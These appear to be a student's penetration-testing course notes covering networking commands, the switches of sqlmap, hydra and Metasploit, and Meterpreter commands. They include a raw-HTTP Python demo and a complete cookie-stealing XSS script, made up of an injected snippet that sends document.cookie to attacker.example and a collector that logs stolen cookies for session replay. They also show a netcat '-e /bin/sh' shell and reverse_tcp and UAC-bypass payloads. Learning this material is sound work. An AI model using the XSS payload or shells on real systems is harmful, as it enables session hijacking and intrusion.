Tools and Commands learned from PTS → elearnsecurity:-


  1. Wireshark:- a protocol analyzer (network sniffer) that shows the data transmitted over the network, so you can see whether data is sent in clear text or encrypted.
  2. Burp Suite:- used to send HTTP/HTTPS requests and analyze the requests and responses.
  3. Subdomain enumeration tools:- sublist3r, amass (they collect DNS data from various sources).

Commands (linux OS):-

  1. To view the routing table:- ip route
  2. To add a route manually:- sudo ip route add <network>/<prefix> via <gateway-ip>
  3. To view the ARP cache:- ip neigh
  4. To view network statistics and protocol status:- netstat
  5. To resolve a DNS name to an IP address (forward resolution; reverse resolution is IP to name):- ping <name> shows the resolved address in its first line
  6. To talk to a web site by hand over plain HTTP (type the request, read the raw response):- netcat/nc <host> 80
  7. The same over HTTPS:- openssl s_client -connect <host>:443
  8. Subdomain enumeration (collects DNS data from various sources):- sublist3r, amass
  9. To check whether a machine is alive:- ping
  10. To perform a ping sweep:- fping -a -g <range>
  • -a → show only alive hosts
  • -g → generate the target list from a range (start and end address, or a CIDR) instead of naming hosts one by one
  • -P0 / -h <target host> / -s <signature file> → not fping switches; they match the web-server fingerprinting tool httprint (-P0 skips the ping, -h names the target host, -s names the signature file)
HTTP methods (what you type after connecting with netcat or openssl s_client):-
GET:- to request web pages and pass arguments (in the query string).
POST:- to submit data from web forms (in the request body).
HEAD:- to get only the headers of the response, without the body.
PUT:- to upload a file to the web server (if the server allows it).
DELETE:- to remove a file from the web server (if the server allows it).
OPTIONS:- to ask the web server which HTTP verbs are enabled (returned in the Allow header).
netcat usage:-
TCP connection between client and server:- nc <host> <port>
UDP connection between client and server:- nc -u <host> <port>
TCP connection with a shell attached, so the other side can execute shell commands:- nc -e /bin/sh (only in netcat builds that support -e)
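The raw exchange behind items 6 and 7 and the HTTP methods above, as an added example (not the course's or the note author's code): it builds the request bytes you would otherwise type into netcat, sends them over a plain or TLS socket (the TLS path does what openssl s_client -connect does for you), parses the reply, and when run directly starts a throwaway server on 127.0.0.1 so GET, HEAD and OPTIONS can be compared offline. The local server, its port and its response body are constructed for the demo; ssl.create_default_context() verifies certificates, so a self-signed target needs its CA added first.

```python
"""Raw HTTP by hand, the way netcat or `openssl s_client -connect` lets you
do it.  Added example, not code from the original notes."""
import socket
import ssl
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


def build_request(method, host, path="/", extra_headers=None):
    """Build the exact bytes you would type into netcat.  HTTP/1.1 requires
    CRLF line endings, a Host header, and an empty line ending the headers."""
    headers = {"Host": host, "Connection": "close"}   # close: we read until EOF
    headers.update(extra_headers or {})
    lines = [f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_response(raw):
    """Split a raw reply into (status code, reason, headers, body).
    Header names are lower-cased; the body is left as bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    _version, code, reason = (status_line.split(" ", 2) + [""])[:3]
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return int(code), reason, headers, body


def raw_http(host, port, method="GET", path="/", tls=False, timeout=5):
    """Send one request and return the parsed reply.  tls=True wraps the
    socket in TLS first, which is what `openssl s_client` does for you."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(build_request(method, host, path))
        chunks = []
        while True:                       # Connection: close -> read to EOF
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_response(b"".join(chunks))


class _DemoHandler(BaseHTTPRequestHandler):
    """Constructed target for the demo: a cleartext server answering
    GET, HEAD and OPTIONS so the three verbs can be compared side by side."""
    body = b"hello in clear text\n"

    def _headers(self, status=200):
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(self.body)))
        self.end_headers()

    def do_GET(self):
        self._headers()
        self.wfile.write(self.body)

    def do_HEAD(self):                    # same headers as GET, no body
        self._headers()

    def do_OPTIONS(self):                 # advertise the enabled verbs
        self.send_response(204)
        self.send_header("Allow", "GET, HEAD, OPTIONS")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):         # keep the demo output quiet
        pass


def demo():
    """Run GET, HEAD and OPTIONS against a throwaway local server."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), _DemoHandler)  # port 0: any free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address
    try:
        return {m: raw_http(host, port, method=m) for m in ("GET", "HEAD", "OPTIONS")}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for method, (status, reason, headers, body) in demo().items():
        print(f"{method}: {status} {reason}  Allow={headers.get('allow', '-')}  body={body!r}")
```

Running it prints one line per verb: GET carries the body, HEAD returns the same headers with an empty body, and OPTIONS answers with an Allow header and no body. Against a real host, raw_http("example.test", 443, tls=True) is the openssl s_client equivalent.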
sqlmap switches:-
  • -h → to view the sqlmap manual (-hh for the full one).
  • -u → the target URL.
  • -p → the parameter(s) to test; without it sqlmap tests every parameter it finds, so with a single parameter it can be left out.
  • --dbms= → the back-end DBMS type (e.g. MySQL, MSSQL), not a database name; -D names a database.
  • --technique= → the SQL injection technique(s) to use.
  • -b/--banner → retrieve the DBMS banner.
  • --tables → enumerate tables.
  • --columns → enumerate columns.
  • --dump → dump the entries of the tables.
  • --wizard → guided mode for beginners.
hydra switches:-
  • without any switches/-h → to view the hydra manual.
  • -U <module> → to view details about a module.
  • -L <file> → to take the usernames from a list file (-l for a single username).
  • -P <file> → to take the passwords from a list file (-p for a single password).
  • service://target → to specify the module (service) and the target in URL form.
smbclient switches (these two are not hydra switches):-
  • -L <target> → list the services (shares) available on the target.
  • -N → do not ask for a password (tries an anonymous/null session).

To enable IP forwarding on the attacker machine (the kernel then relays packets that are not addressed to it, which is needed when you sit in the middle of a connection):- sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

msfconsole commands:-
  • show -h → to view the manual for the show command.
  • search <term> → to search for a given term or module.
  • show exploits → to display the exploit modules.
  • use <module path> → to select an exploit.
  • back → to leave the selected module (cancels the exploitation setup).
  • info → to display information about the selected module.
  • show options → to check the module's options.
  • set <option> <value> → to configure an option.
  • show payloads → to show the payloads compatible with the selected exploit.
  • set PAYLOAD <payload path> → to choose a payload.
  • exploit → to launch the exploit.
  • bind_tcp payloads run a server process on the target machine that waits for a connection from the attacker machine → set PAYLOAD java/meterpreter/bind_tcp
  • reverse_tcp payloads make a TCP connection back to the attacker machine (this usually gets through firewalls and NAT where bind_tcp does not) → set PAYLOAD linux/x86/meterpreter/reverse_tcp
  • bypassuac bypasses Windows User Account Control on an already compromised host → use exploit/windows/local/bypassuac
Meterpreter commands:-
  • background → to switch from the Meterpreter session back to the console.
  • sessions -l → to list the open sessions.
  • sessions -i <session number> → to switch to an open session.
  • sysinfo → to retrieve information about the exploited machine.
  • ifconfig → prints the network configuration.
  • route → prints the routing information.
  • getuid → to know which user is running the process.
  • getsystem → to attempt privilege escalation to SYSTEM (Windows targets).
  • shell → to run a standard command shell.
  • help → to display all Meterpreter commands.
  1. XSS attack (cookie stealing):-
The code on the attacker's server saves the cookies it receives from the victim's browser.
The code inserted into the vulnerable web site makes the victim's browser send its cookies to the attacker's server.
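The two pieces of code the note describes, written out as an added example (not the course's or the note author's own code): the snippet injected into the vulnerable page, and the collector that runs on the attacker's machine and saves what arrives. attacker.example:8080 and stolen_cookies.jsonl are placeholders. Two caveats worth checking before relying on this: document.cookie does not contain cookies set with the HttpOnly flag, so a session cookie with that flag cannot be stolen this way, and the beacon only leaves the browser if the page's Content Security Policy (img-src) allows loading images from the collector's origin.

```python
"""Both halves of a cookie-stealing XSS, as an added example (not the notes'
own code).  ATTACKER_HOST and LOG_FILE are placeholders."""
import json
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

ATTACKER_HOST = "attacker.example:8080"   # hypothetical collector address
LOG_FILE = "stolen_cookies.jsonl"         # where the collector appends records


def xss_payload(collector=ATTACKER_HOST):
    """The code inserted into the vulnerable page.  It runs in every victim's
    browser that renders it and loads an 'image' whose URL carries
    document.cookie; no response is needed, so a 204 from the collector is fine.
    Cookies flagged HttpOnly are NOT in document.cookie."""
    return ('<script>new Image().src="http://' + collector +
            '/c?d=" + encodeURIComponent(document.cookie);</script>')


def record_cookie(path, source_ip, when=None):
    """Parse a collector request path such as /c?d=PHPSESSID%3Dabc and
    return the record to store, or None if it is not a cookie beacon."""
    query = parse_qs(urlparse(path).query)
    if "d" not in query:
        return None
    return {
        "time": when or time.strftime("%Y-%m-%dT%H:%M:%S"),
        "ip": source_ip,
        "cookie": query["d"][0],          # parse_qs already URL-decodes
    }


class Collector(BaseHTTPRequestHandler):
    """The code on the attacker's server: saves each cookie beacon to LOG_FILE."""

    def do_GET(self):
        record = record_cookie(self.path, self.client_address[0])
        if record is not None:
            record["referer"] = self.headers.get("Referer", "")   # page the script ran on
            with open(LOG_FILE, "a") as log:
                log.write(json.dumps(record) + "\n")
        self.send_response(204)           # empty reply; a broken <img> is invisible
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):         # nothing on stdout
        pass


if __name__ == "__main__":
    print("inject this into the vulnerable page:", xss_payload())
    HTTPServer(("0.0.0.0", 8080), Collector).serve_forever()
```

Each line of stolen_cookies.jsonl holds the time, the victim's IP, the cookie string and the Referer (the page the script ran on), which is what you need to replay the session.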

Commands (Windows OS):-

  1. Tool to display NetBIOS information about a target (its name table, which shows e.g. whether it offers file sharing):- nbtstat
  • /? → to view the help.
  • -A <ip> → display the NetBIOS name table of the target given by IP (-a takes a NetBIOS name instead).
  • <00> → the workstation service (the host's own name).
  • <20> → the file server service, i.e. the host has file sharing enabled.
  2. Enumerate a target over SMB (these three are enum4linux switches, a Linux tool, not nbtstat's):-
  • -S → enumerate file shares
  • -U → enumerate users
  • -P → check the password policy



